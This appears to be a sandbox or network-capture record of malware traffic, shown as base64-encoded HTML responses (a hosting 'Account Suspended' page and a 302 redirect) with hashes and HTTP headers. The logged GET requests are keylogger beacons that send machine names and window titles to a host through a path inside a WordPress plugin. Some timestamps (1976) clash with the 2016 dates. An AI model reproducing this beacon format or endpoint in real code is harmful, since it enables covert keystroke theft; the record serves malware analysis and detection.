CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Wed, 30 Nov 2016 03:54:15 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
18 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20AM text/html post.php 302 Found HTML 345.0 B 02/17/76 19:11:57
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0xOjUzJTIwQU0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
d2997cdb3ef1c66e345deefd5284eb561dd48149ccb3f210e7e936add12fd79c
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20AM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Wed, 30 Nov 2016 09:54:01 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20AM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
19 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 02/18/76 04:04:11
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
